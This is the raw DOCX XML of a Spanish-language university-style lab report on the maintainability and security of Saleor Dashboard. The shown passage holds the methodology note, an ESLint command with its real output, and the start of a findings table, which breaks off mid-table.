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Verificación No Funcional — Saleor Dashboard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7ba76062d72a467534595ca5e3655a2beb47cdb"/>
      <w:r>
        <w:t xml:space="preserve">Verificación No Funcional de un Sistema Open-Source</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="X3d6ffe3639292459c5c7f74421d1547d32032fe"/>
      <w:r>
        <w:t xml:space="preserve">Parte 3 — Extensión de Laboratorio: Mantenibilidad y Seguridad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema analizado:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Saleor Dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Repositorio oficial:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">https://github.com/saleor/saleor-dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Versión analizada:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.23.6 (monorepo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">saleor-platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, frontend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">saleor-dashboard/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Backend asociado (contexto):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Saleor Core 3.24, https://github.com/saleor/saleor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stack:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">React 18.3.1 · TypeScript 5 · Apollo Client 3.4.17 · GraphQL 16.11.0 · Vite · macaw-ui-next 1.4.2 · servido como estático tras Nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fecha:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6 de junio de 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="nota-metodológica-importante"/>
      <w:r>
        <w:t xml:space="preserve">Nota metodológica (importante)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El análisis se realizó sobre el código fuente real del Dashboard.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ESLint se ejecutó realmente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro del contenedor del dashboard (que ya tiene las dependencias instaladas); su salida cruda y la interpretación están en la sección 1.1. El análisis SAST (Semgrep), el escaneo de imágenes (Trivy) y el dinámico (OWASP ZAP) requieren binarios/servicios adicionales: se documentan con el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">comando exacto de reproducción</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y, donde aún no se ha pegado la ejecución, un bloque marcado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar salida cruda de la herramienta]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Mientras tanto, sus hallazgos se sustentan en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">inspección estática del código con archivo + línea verificables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. OWASP ZAP lo ejecuta el equipo (se incluye el procedimiento y la plantilla de resultados).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="sección-1-mantenibilidad"/>
      <w:r>
        <w:t xml:space="preserve">Sección 1 — Mantenibilidad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="Xbd652c488ec027bae843c1d4a2baee42d53f03a"/>
      <w:r>
        <w:t xml:space="preserve">1.1 Análisis estático (ESLint) — resultados e interpretación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Herramienta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ESLint 9 con la configuración del propio proyecto (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eslint.config.mjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">typescript-eslint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">type-checking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@graphql-eslint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">react-hooks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unicorn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y reglas locales en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lint/rules/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comando ejecutado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(dentro del contenedor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que ya tiene las dependencias instaladas; PowerShell en Windows):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker compose -f docker-compose.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">full</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec -T dashboard npx eslint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"src/discounts/components/CouponPracticeButton"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"src/legacy-sdk/core/auth.ts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"src/index.css"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se ejecuta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">--fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">reportar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">los problemas. El script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm run lint:eslint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del proyecto incluye</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y los corregiría automáticamente, eliminando la evidencia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Salida real:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/src/discounts/components/CouponPracticeButton/CouponPracticeButton.tsx</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   19:20  warning  Field `node.id` must be selected when it's available on a type   @graphql-eslint/require-selections</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   26:27  warning  Field `channelListings.id` must be selected when it's available  @graphql-eslint/require-selections</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   27:21  warning  Field `channel.id` must be selected when it's available          @graphql-eslint/require-selections</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   56:43  warning  Missing return type on function   @typescript-eslint/explicit-function-return-type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   59:40  warning  Missing return type on function   @typescript-eslint/explicit-function-return-type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   66:38  warning  Missing return type on function   @typescript-eslint/explicit-function-return-type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   69:5   error    Expected blank line before this statement   padding-line-between-statements</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   81:7   error    Expected blank line before this statement   padding-line-between-statements</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   90:53  warning  Missing return type on function   @typescript-eslint/explicit-function-return-type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   92:5   error    Expected blank line before this statement   padding-line-between-statements</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">   95:5   error    Expected blank line before this statement   padding-line-between-statements</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  183:8   warning  Prefer named exports   import/no-default-export</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/src/discounts/components/CouponPracticeButton/index.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  2:8  warning  Do not alias `default` as `default`. Just export `default` itself instead   import/no-default-export</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/src/index.css</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  0:0  warning  File ignored because no matching configuration was supplied</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/app/src/legacy-sdk/core/auth.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  146:59  warning  Missing return type on function   @typescript-eslint/explicit-function-return-type</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">✖ 15 problems (4 errors, 11 warnings)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  4 errors and 0 warnings potentially fixable with the `--fix` option.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="resumen-e-interpretación-de-hallazgos"/>
      <w:r>
        <w:t xml:space="preserve">Resumen e interpretación de hallazgos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="4999.999999999999"/>
        <w:tblLook w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1827"/>
        <w:gridCol w:w="2436"/>
        <w:gridCol w:w="1827"/>
        <w:gridCol w:w="1827"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:firstRow="1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Regla ESLint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nº</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Archivo : línea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Interpretación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@graphql-eslint/require-selections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:19, 26, 27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La query</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PracticeVouchers</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">no selecciona el campo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">en</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">node</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">channelListings</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">channel</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Sin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, la normalización de la caché de Apollo es deficiente y puede causar inconsistencias de datos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@typescript-eslint/explicit-function-return-type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:56, 59, 66, 90</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth.ts:146</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Funciones sin tipo de retorno explícito, incluida</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">writeAuthState</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(refactor del login). Debilita el contrato de tipos y la legibilidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">padding-line-between-statements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4 (error)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:69, 81, 92, 95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Falta línea en blanco antes de ciertas sentencias; incumple el estilo del proyecto. Son los</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">únicos 4 errores</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(bloquean el lint).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">import/no-default-export</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
